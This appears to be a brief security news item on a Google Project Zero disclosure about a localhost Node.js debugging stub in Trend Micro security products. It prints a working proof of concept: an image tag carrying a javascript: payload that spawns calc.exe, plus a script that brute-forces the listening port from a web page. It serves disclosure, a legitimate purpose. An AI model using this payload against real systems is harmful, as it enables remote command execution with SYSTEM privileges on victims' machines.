Tavis Ormandy from Google Project Zero revealed details of a critical vulnerability in Trend Micro antivirus products, which can lead to remote compromise of vulnerable system.
The following products are vulnerable:
- Trend Micro Maximum Security
- Trend Micro Premium Security
- Trend Micro Password Manager
The vulnerability is caused due to remote Node.js debugging stub running on localhost by default. A remote unauthenticated attacker can execute arbitrary commands on vulnerable system with SYSTEM privileges.
To exploit this vulnerability, the victim should visit a specially crafted website. The exploit code, which executes calc.exe program (windows calculator) looks as follows:
<img src="http://localhost:40000/json/new/?javascript:require('child_process').spawnSync('calc.exe')
Port number, on which Node.js is listening, can be changed by the application, so the attacker should brute-force it. This can be done using the following JS script:
<script>
var port = 49152;
var maxport = 60000;
var concurrent = 128;function nextPort()
{
var img = document.createElement('IMG');
img.alt = "Testing " + port + "...";
img.src = "http://127.0.0.1:
+ port++
+ "/json/new/?"
+ "javascript:require('child_process')"
+ ".spawnSync('calc.exe')";img.onload = img.onerror = function(e) {
document.body.removeChild(e.target);
nextPort();
}if (port < maxport) {
document.body.appendChild(img);
}
}for (i = 0; i < concurrent; i++)
nextPort();</script>
Trend Micro reportedly issued temporary fix for this vulnerability.
Similar vulnerability was discovered in Password Manager component this January.